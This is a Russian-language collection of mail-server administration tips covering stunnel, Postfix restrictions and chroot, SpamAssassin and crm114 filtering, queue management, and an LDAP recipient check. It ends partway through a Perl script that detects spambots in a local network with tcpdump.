Установка stunnel: cd /usr/ports/security/stunnel make && make install (!) не торопимся делать clean Копируем из папки work в /usr/local/etc/stunnel - stunnel.cnf, затем делаем make clean. Создаем сертификат: cd /usr/local/etc/stunnel && openssl req -new -x509 -days 365 \ -nodes -config stunnel.cnf -out stunnel.pem -keyout stunnel.pem chmod 600 stunnel.pem && chown root:wheel stunnel.pem Конфиг для stunnel: cert = /usr/local/etc/stunnel/stunnel.pem RNDfile = /usr/local/etc/stunnel/stunnel.rnd chroot = /usr/local/var/stunnel/ setuid = stunnel setgid = stunnel pid = /run/stunnel.pid output = /var/log/stunnel.log ciphers = HIGH debug = 6 compression = rle [pop3s] accept = 995 connect = 127.0.0.1:110 Делаем chroot: cd /usr/local/var && mkdir stunnel && cd stunnel mkdir etc && touch hosts.allow cd .. && mkdir run Содержание hosts.allow: pop3s : ALL : allow ALL : ALL : deny Права на директории /usr/local/var/stunnel drwxr-xr-x 2 root wheel 512 Jul 30 20:31 etc drwxr-xr-x 2 stunnel stunnel 512 Aug 3 15:55 run Правим rc.conf, если у Вас запускается только popa3d из inetd: inetd_flags="-wWa 127.0.0.1" /usr/local/etc/rc.d/stunnel.sh start Просмотр ciphers: openssl ciphers -v 'HIGH'

Ограничение приема внешней почты в postfix. (доп. ссылка 1) Автор: SHRDLU [обсудить]

Пример введения ограничений на прием внешней почты для определенных адресов. В конкретном примере, пользователь с адресом test@domain.com имеет право на прием и передачу сообщений только в пределах domain.com. Ни написать на другие адреса, ни принять почту с них он не может. Остальные пользователи спокойно пишут куда хотят и получают почту с любых адресов. /etc/postfix/main.cf: smtpd_recipient_restrictions = hash:/etc/postfix/protected_destinations, check_sender_access hash:/etc/postfix/restricted_senders, permit_sasl_authenticated, permit_auth_destination, reject smtpd_restriction_classes = local_only, insiders_only local_only = check_recipient_access hash:/etc/postfix/local_domains, reject insiders_only = check_sender_access hash:/etc/postfix/local_domains, reject В /etc/postfix/restricted_senders: test@domain.com local_only test@mail.domain.com local_only В /etc/postfix/local_domains: domain.com OK mail.domain.com OK В /etc/postfix/protected_destinations: test@domain.com insiders_only test@mail.domain.com insiders_only И не забыть потом: postmap /etc/postfix/restricted_senders postmap /etc/postfix/local_domains postmap /etc/postfix/protected_destinations postfix reload См. также https://www.opennet.ru/base/net/postfix_per_user_acl.txt.html

Запуск postfix в chroot окружении [обсудить]

1. В /var/spool/postfix создаем директории dev и etc. В etc копируем файлы /etc/host.conf /etc/localtime /etc/services /etc/resolv.conf 2. Правим master.cf, ставим в колонке chroot символ 'y' у следующих процессов: smtp, pickup, cleanup, qmgr, rewrite, bounce, defer, trace, verify, flush, relay, showq, error 3. Активируем proxymap для чтения файлов из вне chroot окружения (/etc/passwd, aliases, различные "map"-файлы), например: local_recipient_maps = $alias_maps proxy:unix:passwd.byname relay_domains = $mydestination, proxy:hash:/usr/local/etc/postfix/relay_domains smtpd_sender_restrictions = check_sender_access proxy:hash:/usr/local/etc/postfix/ access, reject_non_fqdn_sender, reject_unknown_sender_domain smtpd_client_restrictions = check_client_access proxy:hash:/usr/local/etc/postfix/access_clients, check_recipient_access proxy:hash:/usr/local/etc/postfix/spam_allowed, check_client_access proxy:hash:/usr/local/etc/postfix/antispam/blocklist/block_list, check_client_access proxy:hash:/usr/local/etc/postfix/antispam/blocklist/block_list_arc, check_client_access regexp:/usr/local/etc/postfix/dsl_stoplist.txt, reject_rbl_client rbl.test.ru smtpd_recipient_restrictions = check_recipient_access proxy:hash:/usr/local/etc/postfix/fullboxes, reject_non_fqdn_recipient, permit_mynetworks, reject_unknown_recipient_domain, reject_unauth_destination transport_maps = proxy:hash:/usr/local/etc/postfix/transport proxy_read_maps = $smtpd_helo_restrictions $smtpd_recipient_restrictions $smtpd_sender_restrictions \ $smtpd_client_restrictions $local_recipient_maps $mydestination $virtual_alias_maps \ $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps \ $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps \ $relocated_maps $transport_maps $mynetworks 3. Создаем дополнительный syslog сокет в chroot окружении: FreeBSD: "syslogd -l /var/spool/postfix/dev/log" Linux: "syslogd -a /var/spool/postfix/dev/log"

Как запретить выполнение программ через .forward файл. [обсудить]

Часто ограничив cgi скрипты пользователей и доcтуп по FTP, забывают про возможность запуска программ через "|script" опцию в .forward файле. Запрещение выполнения скриптов через .forward в Postfix (для агента доставки local): allow_mail_to_commands = alias local_command_shell=/dev/null Вообще запретить .forward, через изменение пути поиска: forward_path = $home/.forward

Как заставить postfix проверять наличие локального пользователя в системе на этапе соединения [комментарии]

В main.cf добавьте строчку: local_recipient_maps = $alias_maps unix:passwd.byname Без данной опции, postfix полностью принимает письмо для любого пользователя, даже для несуществующего, и лишь потом рассылает bounce сообщение. С local_recipient_maps ошибка генерируется сразу на этапе RCPT TO:

Тестирование на открытый relaying [обсудить]

telnet domen 25 HELO hostname VRFY email_адрес EXPN email_addr MAIL FROM: email_адрес_от_кого RCPT TO: email_адрес_кому DATA test . QUIT

Как заставить sendmail не отправлять все тело письма при ошибке [комментарии]

В sendmail.cf добавить nobodyreturn, например: O PrivacyOptions=authwarnings, novrfy, noexpn, nobodyreturn При использовании, M4: define(`conf_PRIVACY_FLAGS', `authwarnings, noexpn, novrfy, nobodyreturn') В Postfix: bounce_size_limit = 10000

какие ограничения нужно установить в sendmail.cf [комментарии]

в sendmail.cf O MaxRecipientsPerMessage=20 O MaxMessageSize=1000000 При использовании M4 макросов: define('confMAX_RCPTS_PER_MESSAGE', '20') define('confMAX_MESSAGE_SIZE', '1000000')

Какие ограничения для пользователей выставить в Postfix. [комментарии]

# Ограничиваем размер сообщения в 1 Мб. message_size_limit = 1024000 # Ограничичиваем число CC в одном письме. smtpd_recipient_limit = 5 # Ограничиваем размер ящика mailbox_size_limit = 51200000 Если patch.mailbox: # формат inbox-size-override: login макс_размер default_mailbox_size = 5000 mailbox_size_map = hash:/etc/postfix/inbox-size-override

Как заблокировать проверку наличия аккаунта в системе через SMTP [комментарии]

Проверку через "expn логин_пользователя" или "vrfy логин_пользователя", можно заблокировать в sendmail: В sendmail.cf добавить "O PrivacyOptions=authwarnings, noexpn, novrfy" (можно использовать опции needexpnhelo, needvrfyhelo, которые требуют наличия предварительного HELO для выполнения EXPN или VRFY) или m4 макросом define(`conf_PRIVACY_FLAGS', `authwarnings, noexpn, novrfy') В Рostfix: disable_vrfy_command = yes

Борьба со спамом, фильтрация почты

Удаление адреса почтового сервера из чёрных списков SORBS.net Автор: sarge [комментарии]

Тема блэклистов известна, наверное, каждому администратору почты. Однако здесь, как и везде, есть подводные камни. Речь идет о sorbs.net. Если вы попали туда один раз (т.е. без повторений), то в течение 48 часов ваш адрес удалится из их базы автоматически. Либо же, вы можете сделать это вручную на их сайте. Однако если, вы попадали туда неоднократно, т.е. отметок о спаме с вашего IP более двух, то простой метод удаления не работает. Что надо сделать: 1. полечить почтовый сервер, чтобы спама больше не было гарантированно; 2. создать аккаунт на их сайте; 3. отослать заявку в их SUPPORT. Дело должно закончиться вот этим: Created SORBS ticket #123456 Created SORBS ticket [sorbs.net #123456] in the database. You should receive an email about this ticket shortly, please use the SORBS Ticket interface at: http://support.sorbs.net/Ticket/Display.html?id=123456 И вот тут начинается самое интересное! Никакого ответа вам не придёт. Заявка будет закрыта автоматом с отрицательным статусом. Для того чтобы добиться внимания их специалиста, надо зайти в их тикет-систему по ссылке выше (не спешите закрывать страницу support после оформления заявки!) и там найти вот такой ответ робота: This host has not been previously delisted but has more than 10 previous listings We are setting this ticket to 'Rejected', as an action is required in your part before we can update our lists regarding the IP address(es) you wrote to us about. Action required: As you are requesting a delisting of an IP/Network that has either sent spam recently or has sent so much spam that it exceeds our preset thresholds you must reply to this message justifying your cause and why you think you should be delisted. Someone will then review your case and reply accordingly. И сделать ответ на него, поменяв статус письма на открытый! Далее после непродолжительного ожидания получаем: As you've resolved this issue, and we have seen no further spam occurrences within the last 48 hours, I've de-listed this IP. Please feel free to open a new request should any of your IPs become listed again.

Фильтрация исходящих почтовых сообщений с помощью sieve Автор: Alexander Galanin [комментарии]

Предпочитаю хранить почтовые дискуссии в одном месте, а не держать отправленные письма отдельно в папке Sent, как это по умолчанию делают IMAP-клиенты. Поэтому по добавлению новой почты в папку Sent я вызываю sieve-скрипт для её обработки. Конфигурация
почтовый сервер dovecot, dovecot-imapd, dovecot-sieve
почта хранится в домашнем каталоге пользователя в формате maildir
для слежения за состоянием файловой системы используется incron Настройка Создаём скрипт, фильтрующий отправленные сообщения. Например, такой (расширение imap4flags нужно для сохранения флага \\seen у сообщения): require ["imap4flags", "fileinto", "variables", "date"]; # Сохраняем архив сообщений в папку archive.$год if currentdate :matches "year" "*" { set "archiveFolder" "archive.${1}"; } # Сообщения, отправленные самому себе. Нет смысла иметь копию, так что помещаем в Trash. if address :is "To" "user@example.com" { fileinto "Trash"; stop; } # Сообщения в списки рассылок сразы кладём в архив. if address :is "To" "debian-russian@lists.debian.org" { fileinto "${archiveFolder}"; stop; } # Если письмо является ответом на что-то, то кладём его в INBOX. if exists "In-Reply-To" { fileinto "INBOX"; } # Все прочие сообщения будут оставлены на своём месте. Проверяем скрипт на папке Sent (путь к месту расположения берётся из конфигурации dovecot). Скрипт выведет список действий, которые будут проведены с каждым письмом. Убеждаемся, что он делает именно то, что нужно: sieve-filter /path/to/script Sent Далее настраиваем таблицу incron. Для этого записываем в редакторе нижеприведённую при вызове incrontab -e. sieve-скрипт будет вызываться при перемещении новых писем в maildir-папку Sent и будет обрабатывать всё там находящееся. /home/user/Maildir/.Sent/cur IN_MOVED_TO /usr/bin/sieve-filter -e -W /path/to/script При следующей отправке письма папка отсортируется. Замечу, что подобным образом можно фильтровать любую другую папку при помещении в неё писем.

Настройка crm114 в связке с dovecot-antispam Автор: Alexander Galanin [комментарии]

Плагин dovecot-antispam для dovecot позволяет сделать обучение спамофильтра более удобным: указав плагину имя директории со спамом, можно автоматически обозначать почту как спам или не спам, перенося её в/из этой директории соответственно. В данном статье рассматривается способ организации связки MDA (maildrop), фильтра (crm114) и IMAP-сервера (dovecot) для реализации этой возможности. В качестве базовой системы рассматривается Debian 6.0 (squeeze). Установка Установим необходимые пакеты штатным способом из репозитория (для dovecot-antispam потребуется подключить репозиторий squeeze-backports или взять версию из wheezy):
dovecot
dovecot-antispam
crm114 (содержит почтовый фильтр)
maildrop (или любой другой MDA, который Вы сумеете настроить должным образом)
mew-bin (для распаковки MIME-вложений) Настройка dovecot-antispam Скопируйте шаблон настроек плагина из man dovecot-antispam в /etc/dovecot/dovecot.conf или во включаемый файл настроек. Задайте путь к исполняемому файлу mailreaver из состава crm114 и укажите имена папок для спама, подозрительных на спам писем и папки удалённых сообщений. plugin { # backend selection, MUST be configured first, # there's no default so you need to set one of # these options: antispam_backend = crm114 # semicolon-separated list of Trash folders (default unset i.e. none) antispam_trash = Trash # semicolon-separated list of spam folders antispam_spam = spam # semicolon-separated list of unsure folders (default unset i.e. none) antispam_unsure = suspicious #=================== # crm114 plugin # mailreaver binary antispam_crm_binary = /usr/share/crm114/mailreaver.crm # semicolon-separated list of extra arguments to dspam # (default unset i.e. none) antispam_crm_args = --fileprefix=%h/.crm114/ # NOTE: you need to set the signature for this backend antispam_signature = X-CRM114-CacheID } Включите плагин антиспама в dovecot.conf protocol imap { mail_plugins = antispam mail_plugin_dir = /usr/lib/dovecot/modules/imap } Предварительная настройка CRM114 Согласно указанному в переменной antispam_crm_args, будем хранить настройки crm114 в подкаталоге .crm114 родительского каталога пользователя. Распакуйте пример настроечного файла mailfilter.cf из /usr/share/doc/crm114/examples/mailfilter.cf.gz и отредактируйте его, особое внимание обратив на поля spw, mime_decoder, log_to_allmail.txt и trainer_invoke_command. Создайте файл rewrites.mfp аналогичного вида, указав подходящую информацию: vassile@pupkine.example.com>->MyEmailAddress [[:space:]]Vassile Pupkine>-> MyEmailName mail.example.com>->MyLocalMailRouter 192.168.10.20>->MyLocalMailRouterIP Инициализируйте базы спама/не спама: cssutil -b -r spam.css cssutil -b -r nonspam.css Создайте (возможно, пустой) файл priolist.mfp, предназначенный для хранения белых/чёрных списков хостов Настройка MDA При получении письма следует его сначала пропустить через mailreaver из комплекта CRM114, чтобы добавить заголовки с информацией о результате проверки и идентификатором сообщения в кеше. Последнее будет использоваться впоследствии при переобучении фильтра. Затем, в зависимости от результатов проверки, письмо сохраняется в папку спама или подозрительных писем. Для maildrop и хранилища почты в виде Maildir вышеописанное будет выглядеть следующим образом: DEFAULT="$HOME/Maildir" xfilter "/usr/share/crm114/mailreaver.crm -u $HOME/.crm114/" if (/X-CRM114-Status: SPAM.*/) { to $DEFAULT/.spam/ } if (/X-CRM114-Status: Unsure.*/) { to $DEFAULT/.suspicious/ } Обучение спамофильтра Теперь пора приступать к обучению фильтра:
Спам перемещать в папку spam
Нужные сообщения перемещать из папок spam и suspicious в подходящее место
Для обучения спамофильтра на ранее пришедших письмах используйте: "/usr/share/crm114/mailreaver.crm -u $HOME/.crm114/ --good < /путь/к/письму "/usr/share/crm114/mailreaver.crm -u $HOME/.crm114/ --spam < /путь/к/письму
Для исходящей почты предусмотрен отдельный режим обучения: "/usr/share/crm114/mailreaver.crm -u $HOME/.crm114/ --outgoing < /путь/к/письму

Модификация транзитной почты на сервере с Postfix (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Для автоматического добавления текста к письмам, например, уведомления о необходимости сохранения коммерческой тайны, можно использовать alterMIME (http://pldaniels.com/altermime/). При помощи alterMIME также можно добавлять в транзитную почту произвольные заголовки, изменять содержимое существующих заголовков, удалять и заменять вложения в зависимости от имени файла и типа контента. Устанавливаем altermime в Debian/Ubuntu: aptitude install altermime или для Fedora/CentOS: yum install altermime Для запуска altermime-фильтров будем использовать отдельного пользователя: useradd -r -c "Postfix Filters" -d /var/spool/filter filter mkdir /var/spool/filter chown filter:filter /var/spool/filter chmod 750 /var/spool/filter Создаем скрипт /etc/postfix/disclaimer для запуска alterMIME, взяв за основу готовый пример, который есть в комплекте: cp /usr/share/doc/altermime/examples/postfix_filter.sh /etc/postfix/disclaimer chgrp filter /etc/postfix/disclaimer chmod 750 /etc/postfix/disclaimer По умолчанию скрипт не различает входящие и исходящие письма, для того чтобы добавлять уведомление только в исходящие письма скрипт нужно немного модифицировать. Правим скрипт /etc/postfix/disclaimer: #!/bin/sh INSPECT_DIR=/var/spool/filter SENDMAIL=/usr/sbin/sendmail DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses # Exit codes from <sysexits.h> EX_TEMPFAIL=75 EX_UNAVAILABLE=69 # Clean up when done or when aborting. trap "rm -f in.$$" 0 1 2 3 15 # Start processing. cd $INSPECT_DIR || { echo $INSPECT_DIR does not exist; exit $EX_TEMPFAIL; } cat >in.$$ || { echo Cannot save mail to file; exit $EX_TEMPFAIL; } # obtain From address from_address=`grep -m 1 "From:" in.$$ | cut -d "<" -f 2 | cut -d ">" -f 1` if [ `grep -wi ^${from_address}$ ${DISCLAIMER_ADDRESSES}` ]; then /usr/bin/altermime --input=in.$$ \ --disclaimer=/etc/postfix/disclaimer.txt \ --disclaimer-html=/etc/postfix/disclaimer.txt \ --xheader="X-Copyrighted-Material: Please visit http://www.company.com/privacy.htm" || \ { echo Message content rejected; exit $EX_UNAVAILABLE; } fi $SENDMAIL "$@" <in.$$ exit $? Создаем файл etc/postfix/disclaimer_addresses с перечнем адресов для которых следует добавлять уведомление: test1@example.com test2@example.com Текст уведомления помещаем в файл /etc/postfix/disclaimer.txt. Настраиваем Postfix для вызова alterMIME, в /etc/postfix/master.cf добавляем в строку "smtp": -o content_filter=dfilt: т.е. получаем: smtp inet n - - - - smtpd -o content_filter=dfilt: в конец файла добавляем: dfilt unix - n n - - pipe flags=Rq user=filter argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient} Перезапускаем Postfix: /etc/init.d/postfix restart Для замены или удаления вложения необходимо изменить скрипт /etc/postfix/disclaimer, использовав другие опции запуска altermime: "--remove=имя файла" (удаление вложения), "--replace=имя файла --with=файл для замены" (замена вложения), "--removeall" (удаление всех вложений), "--alter-header=заголовок --alter-with=замены --alter-mode=replace" (замена заголовка), "--xheader=заголовок" (добавление заголовка)

Скрытие локальных адресов авторизованных пользователей в Postfix (доп. ссылка 1) Автор: sanmai [комментарии]

Необходимо, чтобы вместо подобных заголовков: Received: from localhost (dyn.pool.example.net [172.31.64.88]) (using TLSv1 with cipher DHE-RSA-AES128-SHA (128/128 bits)) (No client certificate requested) by mx.example.com (Postfix) with ESMTPSA id A2019508951 for <user@example.net>; Wed, 23 Jun 2010 17:34:29 +0900 (JST) стало так: Received: by mx.example.com (Postfix) with ESMTPSA id A2019508951 for <user@example.net>; Wed, 23 Jun 2010 17:34:29 +0900 (JST) Решение: 1. Включаем добавление нужного нам заголовка: smtpd_sasl_authenticated_header = yes 2. Включить header_checks, если они ещё не включены: header_checks = pcre:/etc/postfix/header_checks 3. Добавить в /etc/postfix/header_checks правило для замены строки, которую хочется скрыть, заменив в примере mx\.example\.com на имя нужного почтового сервера: /^Received: from .*?([[:space:]]+$Authenticated sender: [^)]+$.*by mx\.example\.com .*)/ REPLACE Received: from [127.0.0.1] (localhost [127.0.0.1])${1} 4. Правило легко доработать чтобы скрывалась строка "Authenticated sender". Например, так: /^Received: from .*?$Authenticated sender: [^)]+$[[:space:]]+(by mx\.example\.com .*)/ REPLACE Received: ${1} Проверить полученное регулярное выражение можно командой: postmap -h -q - pcre:/etc/postfix/header_checks < test_message

Примеры управлением очередью сообщений в Postfix [комментарии]

Инициировать внеплановый процесс отправки сообщений, присутствующих в очереди: postqueue -f Показать содержимое очереди: postqueue -p Инициировать внеплановую доставку накопившихся в очереди сообщений для домена test.ru: postqueue -s test.ru Постмотреть параметры сообщения и причины проблем с отправкой для заданного идентификатора сообщения в очереди: postcat -q 54D4E563B51 Очистить из очереди домены по заданной маске: mailq| ./agr_mailq.pl|grep -E 'MAILER-DAEMON|yahoo|\.de|\.fr|\.it|\.ch'|awk '{print $1}'\ | tr -d '*!'|xargs -J{} -n1 postsuper -d {} deferred mailq| ./agr_mailq.pl|grep -E 'MAILER-DAEMON|yahoo|\.de|\.fr|\.it|\.ch'|awk '{print $1}'\ | tr -d '*!'|xargs -J{} -n1 postsuper -d {} где agr_mailq.pl скрипт следующего содержания: #!/usr/bin/perl my $cur_line=""; while(<>){ chomp(); if (/^[\w\d\*]+\s+\d+/){ print "$cur_line\n"; $cur_line=$_; } else { s/\s+//s; $cur_line .= "\t" . $_; } } Отфильтровать и удалить из очереди только сообщения на 5 и более адресов разом: mailq |./agr_mailq_big.pl| tr -d '*!'|xargs -J{} -n1 postsuper -d {} где agr_mailq_big.pl: #!/usr/bin/perl my $cur_line=""; my $counter=0; while(<>){ chomp(); if (/^[\w\d\*]+\s+\d+/){ if ($counter >= 5){ print "$cur_line\n"; } $cur_line=$_; $counter=0; } else { s/\s+//s; $cur_line .= "\t" . $_; $counter++; } } Посмотреть список доменов в очереди и число сообщений для них: mailq |./agr_mailq.pl |awk '{print $7}'|cut -d'@' -f2|sort|uniq -c|sort -r -n Записав такие домены в файл, можно вручную отсеять нормальные домены и затем разом удалить мусор из очереди: mailq| ./agr_mailq.pl|grep -f ./spamdomains.list |awk '{print $1}'\ | tr -d '*!'|xargs -J{} -n1 postsuper -d {}

Пример настроек для Spamassassin [комментарии]

/etc/mail/spamassassin/local.cf # Порог срабатывания пометки на спам required_hits 5.0 # Пометка спама через добавление метки в заголовок: rewrite_header Subject ***SPAM*** rewrite_subject 1 report_safe 0 report_charset koi8-r # Сети из которых не помечать сообщения как спам trusted_networks 211.57.52. internal_networks 218.43.28.0/255.255.255.0 # Пропускаем только сообщения на русском и английском языках (слишком русурсоемкая операция!) ok_locales en ru uk # Не используем для массовых систем баесовские адаптивные методы. use_bayes 0 # bayes_path /path # Автоматически формируем белый список, чтобы не проверять уже ранее признанные не спамом сообщения use_auto_whitelist 1 auto_whitelist_path /usr/local/amavis/db/auto_whitelist # Пропускаем проверки, вносящие заметную задержку в обработку сообщения. # Для небольшого трафика можно включить use_razor2 0 use_dcc 0 use_pyzor 0 skip_rbl_checks 1 # dns_available no # num_check_received 0 # bl_timeout 1 dns_available test: 211.57.52.2 218.43.28.2 # Изменение весовых характеристик, влияющих на пометку как спам. # Подобрано экспериментальным путем score MIME_HTML_ONLY 3.0 score HTML_MESSAGE 0.5 score MIME_HTML_MOSTLY 2.5 score FORGED_OUTLOOK_TAGS 1.8 score SUBJ_ILLEGAL_CHARS 1.5 score FROM_ILLEGAL_CHARS 1.0 score HTML_FONTCOLOR_RED 1.0 score HTML_FONTCOLOR_GREEN 1.0 score HTML_FONTCOLOR_BLUE 1.0 score HTML_FONT_INVISIBLE 1.5 score HTML_IMAGE_ONLY_06 3.5 score HTML_FONTCOLOR_UNSAFE 1.5 score HTML_MIME_NO_HTML_TAG 0.1 score HTML_TAG_EXIST_TBODY 1.0 score HTML_TAG_BALANCE_BODY 0.4 score HTML_FONT_BIG 0.8 score RCVD_NUMERIC_HELO 2.0 score MSGID_FROM_MTA_ID 1.8 score MPART_ALT_DIFF 2.0 score HTML_IMAGE_ONLY_04 3.120 score HTML_IMAGE_ONLY_08 2.881 score HTML_IMAGE_ONLY_12 2.360 score HTML_IMAGE_ONLY_16 1.352 score HTML_IMAGE_ONLY_20 1.567 score HTML_IMAGE_ONLY_24 1.088 score HTML_00_10 0.985 score HTML_10_20 1.050 score HTML_20_30 1.241 score HTML_30_40 0.879 score HTML_40_50 0.6 score HTML_50_60 1.053 score HTML_60_70 0.516 score HTML_TEXT_AFTER_HTML 0.5 score HTML_TEXT_AFTER_BODY 0.4 score EXTRA_MPART_TYPE 0.3 score RCVD_HELO_IP_MISMATCH 3.0 # score FORGED_RCVD_HELO 0.0 #score FROM_STARTS_WITH_NUMS 1.0 #score DATE_MISSING 3.000 score HELO_DYNAMIC_ADELPHIA 2 score HELO_DYNAMIC_ATTBI 4 score HELO_DYNAMIC_CHELLO_NL 2 score HELO_DYNAMIC_CHELLO_NO 2 score HELO_DYNAMIC_COMCAST 4 score HELO_DYNAMIC_DHCP 3.5 score HELO_DYNAMIC_DIALIN 3.5 score HELO_DYNAMIC_HCC 4 score HELO_DYNAMIC_HEXIP 3 score HELO_DYNAMIC_HOME_NL 3 score HELO_DYNAMIC_IPADDR 4 score HELO_DYNAMIC_IPADDR2 4 score HELO_DYNAMIC_NTL 3 score HELO_DYNAMIC_OOL 4 score HELO_DYNAMIC_ROGERS 3 score HELO_DYNAMIC_RR2 3 score HELO_DYNAMIC_SPLIT_IP 4 score HELO_DYNAMIC_TELIA 3 score HELO_DYNAMIC_VELOX 3 score HELO_DYNAMIC_VTR 3 score HELO_DYNAMIC_YAHOOBB 4 # Пример, как принудительно не помечать как спам соответствующие # определенным критериями сообщения header FOREX_SUBJECT Subject =~ /^Forex Trading/ describe FOREX_NIGERIAN_SUBJECT Subject is Forex Trading Strategies score FOREX_SUBJECT -2

Проверка существования email в AD (ldap) для маршрутизации письма на Exchange Автор: 2dfx [комментарии]

У нас в компании используется сервер Exchange для обмена почтовыми сообщениями. Но для отправки сообщений во "вне" используем Communigate Pro. Communigate (CGP for Linux) используется только как прослойка и письма отправленные на известные домены пересылаются на Exchange. схема Internet | | Communigate Pro | | Exchange | | Users Но если просмотреть логи, то можно увидеть, что есть огромные очереди на адреса, которых не существует и соответственно куча DNR. Значит нужно как-то отсеивать эти настырные подключения. Пришел к выводу, что можно сделать External Authentication + скрипт на perl + запретить пересылку писем на exchange (это будет делать скрипт) Что было сделано. 1. На communigate включил External Authentication (В helpers) с параметрами: Program Path: /var/CommuniGate/adrelay.pl Time-out: 20s Auto-Restart: 30s Не забыть поставить галку External Authentication 2. Так же на communigate в разделе Users - Domain Defaults - Unknown Names: Consult External for Unknown: Yes Mail to Unknown: Rejected Теперь напишем скрипт в /var/CommuniGate/adrelay.pl #!/usr/bin/perl use Net::LDAP; my $searchBase = 'dc=DOMAIN,dc=local'; my @ldap_servers=( { address=>'XXX.XXX.XXX.XXX', # the address or IP of LDAP server port=>389, # LDAP port, 389 by default timeout=>5, # timeout in seconds, 20 by default adminDN=>'LDAPUSER@DOMAIN.local', # the DN for admin bind adminPassword=>'Password', # the DN PASSWORD for admin bind }, { address=>'XXX.XXX.XXX.XXX', # the address or IP of LDAP server2 port=>389, # LDAP port, 389 by default timeout=>5, # timeout in seconds, 20 by default adminDN=>'LDAPUSER@DOMAIN.local', # the DN for admin bind adminPassword=>'Password', # the DN PASSWORD for admin bind }, { address=>'XXX.XXX.XXX.XXX', # the address or IP of LDAP server3 port=>389, # LDAP port, 389 by default timeout=>5, # timeout in seconds, 20 by default adminDN=>'LDAPUSER@DOMAIN.local', # the DN for admin bind adminPassword=>'Password', # the DN PASSWORD for admin bind }, ); $| = 1; print "* MegaScript started\n"; my ($ldapServerID,$ldapServerTried)=(0,0); while(<STDIN>) { chomp; # remove \n from the end of line my ($prefix,$method,@eargs) = split(/ /); if($method eq 'NEW') { unless($prefix && $method && $eargs[0]) { print "$prefix ERROR Expected: nnn NEW user\@domain\n"; } else { my $errorMsg=new_command($prefix,$eargs[0]); if(defined $errorMsg) { print "$prefix ERROR $errorMsg\n"; } } } elsif ($method eq 'INTF' ) { if($eargs[0] < 3) { print "* This script requires CGPro version 4.1b7 or newer\n"; exit; } exit; } print "$prefix INTF 3\n"; } elsif($method eq 'QUIT') { print "$prefix OK\n"; last; } else { print "$prefix ERROR Only NEW, INTF and QUIT commands supported\n"; } } print "* Megascript done\n"; exit(0); sub tryConnectServer { my $theServer=$ldap_servers[$ldapServerID]; print "* trying to connect to $theServer->{address}\n"; my $ldap = Net::LDAP->new($theServer->{address},port=>($theServer->{port} || 389),timeout=>($theServer->{timeout} || 20) ) || return undef; return $ldap; } sub tryConnect { my $nServers=scalar(@ldap_servers); for(my $nTried=0;$nTried<$nServers;$nTried++) { if($ldapServerID>=$nServers) { $ldapServerID=0;} my $ldap=tryConnectServer(); return $ldap if($ldap); ++$ldapServerID; } return undef; } sub new_command { my ($prefix,$user)=@_; my ($name,$domain)=("",""); if($user =~ /(.+)\@(.+)/) { $name=$1; $domain=$2; } else { return "Full account name with \@ and domain part expected"; } my $ldap = tryConnect(); unless($ldap) { return "Failed to connect to all LDAP servers"; } my $adminDN=$ldap_servers[$ldapServerID]->{adminDN}; my $adminPassword=$ldap_servers[$ldapServerID]->{adminPassword}; my $result=$ldap->bind($adminDN,password=>$adminPassword) || return "Can't bind as admin: ".$result->error; $result->code && return "Can't bind as admin: ".$result->error; my $mesg = $ldap->search ( # perform a search base => $searchBase, scope => "subtree", filter => "(&(proxyAddresses=smtp:$name\@$domain) (objectclass=*))" ); $ldap->unbind(); unless(defined $mesg) { return "LDAP search failed"; } if($mesg->all_entries() eq 0) { return "address $name\@$domain NOT exists"; } else { print "$prefix ROUTED $name\%$domain\@[IPEXCHANGE]\n"; # Pomenyai IPEXCHANGE!!!!!!!!!!!! return undef; } }; Что делает скрипт. При получении адреса e-mail в RCPT TO ищет его в AD в атрибутах пользователей. Если не находит, то сообщение игнорируется. Проверить работоспособность скрипта можно запустив его и набрать 1 NEW email@domain.ru Если выдаст ROUTED email%domain.ru@IPEXCHANGE - то значит все ОК!!!

Автоматизация борьбы со спамботами в своей сети Автор: Дмитрий Иванов [комментарии]

Администраторы больших сетей регулярно получают жалобы на исходящий из них спам. Получив жалобу, можно найти виновного и устранить проблему. Но нехорошо узнавать о таких делах только от чужих людей. Спамеров вполне можно вычислить самому, и принять меры раньше, чем кто-то пострадает. Чисто интуитивно достаточно запустить tcpdump на исходящем канале, и посмотреть, какие IP-адреса больше в сего посылают SYN-пакетов на 25 порт. tcpdump -ni bridge0 'tcp[tcpflags] & tcp-syn != 0 and dst port 25' В идеале это был бы ваш SMTP-сервер. В действительности вы увидите в основном IP-адреса простых пользователей, "одержимых бесами". Дело в том, что обычный спамбот создает SMTP-соединений во много раз больше вашего почтового сервера. Причем с разными IP-адресами. В наши дни все нормальные почтовые сервера имеют PTR-запись DNS. Простые клиенты, напротив, такой записи обычно не имеют. Если почтовый сервер может устанавливать SMTP-соединения со множеством IP-адресов, то для простого клиента эта величина обычно не более 1-2 (например, пользование удаленными SMTP-серверами с лаптопа). Исходя из этого, можно автоматически определять спамботов в нашей сети, и блокировать их (например, средствами IPFW). В качестве критерия оценки мы установили максимальное количество IP-адресов, с которыми каждый хост может общаться по SMTP в течение 5 минут. Для хостов с реверсной записью DNS это 200, для хостов без реверсной записи - 20. Если хост превышает этот лимит, он попадает в черный список на сутки. Нами написан Perl-скрипт, запускающий tcpdump на 5 минут, и анализирующий результаты. Хосты-нарушители заносятся в таблицу PostgreSQL для удобства персонала, и затем помещаются в таблицу IPFW. Правила файрвола блокируют все соединения на 25 порт с хостов, находящихся в данной таблице. Текст скрипта: #!/usr/local/bin/perl # dimss@stalin.lv 2009-08-20 my $colltime = 300; # How long to collect data my $rev_limit = 200; # Remote IP limit for hosts with PTR record my $norev_limit = 20; # Remote IP limit for hosts without PTR record my $table_no = 1; # Number of IPFW table use strict; use warnings; use POSIX ':signal_h'; use Socket; use DBI; # # Collect data # Run tcpdump for some time # my $conns = {}; my $mask = POSIX::SigSet->new( SIGALRM ); my $action = POSIX::SigAction->new( sub { system("killall tcpdump"); }, $mask ); my $oldaction = POSIX::SigAction->new(); sigaction(14, $action, $oldaction); alarm($colltime); # Run tcpdump for this amount of time open(T, "/usr/sbin/tcpdump -ni bridge0 'tcp[tcpflags] & tcp-syn != 0 " . "and dst port 25' " . "2>/dev/null |") or die; while(<T>){ /\ ((\d+\.){3}\d+).+?((\d+\.){3}\d+)/; my $locip = $1; my $remip = $3; #print "$locip $remip\n"; 